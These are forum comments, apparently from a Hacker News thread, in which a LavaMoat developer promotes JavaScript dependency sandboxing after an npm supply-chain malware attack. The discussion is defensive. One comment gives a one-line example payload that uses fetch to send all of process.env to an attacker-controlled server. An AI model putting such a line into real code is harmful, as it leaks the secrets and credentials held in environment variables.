https://lavamoat.github.io

https://hardenedjs.org

https://github.com/lavamoat/kipuka

It's an upcoming part of the LavaMoat toolkit (that got on main page here recently for blocking the qix malware)

2. Do local dev with https://github.com/lavamoat/kipuka installed (I'm working on it)

3. If you don't permit the APIs used for loading DLLs they won't load themselves, so runtime protections are valid too. But I recall the DLLs were loaded in lifecycle script.

Try it and see. There's tradeoffs but if you roll it out, it is very powerful.

The sandbox itself is tight, there's a bug bounty even.

The same technology is behind metamask snaps - plugins in a browser extension.

And Moddable has their own implementation

The biggest problem is endowing too powerful capabilities.

We've got ambitious plans for isolating DOM, but that already failed once before.

Most other ecosystems are as vulnerable if not more, they just lack the scale.

OP, The malware is coming to the ecosystem you prefer. Give it time.

LavaMoat Webpack Plugin will soom have the ability to treat parts of your app same as it currently treats packages - with isolation and policy limiting what they can do.

Also, together with a bunch of great folks at TC39 we're trying to get enough building blocks for the same-realm isolation primitives into the language.

see hardenedjs.org too

I'm doing the rounds promoting the project today because at this point all we need to eliminate certain types of malware is get LavaMoat a lot more adoption in the ecosystem.

( and that'll give me bug reports and maybe even contributions? :) )

automated publishing should use something like Pagerduty to signal that a version is being published to a group of maintainers and it requires an approval to go through. And any one of them can veto within 5 minutes.

But we don't have that, so gotta be careful and prepare for the worst (use LavaMoat for that)

with LavaMoat most malware won't work even if you don't detect it.

500$ is nothing. it's what unsophisticated phishing makes in a day. It's what a support call scammer makes their owner in a day.

This was an attack on legitimate npm packages that end up in maybe hundreds of thousands of developer machines building tens of thousands applications.

`fetch(myserverurl+JSON.stringify(process.env)` would be orders of magnitude more profitable as payload.

Anyway, the case where reactive tools (detections, warnings) don't catch it is why LavaMoat exists. It prevents whole classes of malware from working at runtime. The article (and repo) demonstrates that.

Installing from git is not recommended and has more issues than you might think https://dev.to/naugtur/a-phish-on-a-fork-no-chips-52cc

You are supposed to update packages, even if you use lockfiles (very common) or tools that pin your direct dependencies (renovate etc. not so common) And when you do update, will you read the package and all of its updated dependencies?

It's a hard problem with a bunch of tradeoffs.

Can be done, with enough attention and tools. Tools include LavaMoat :)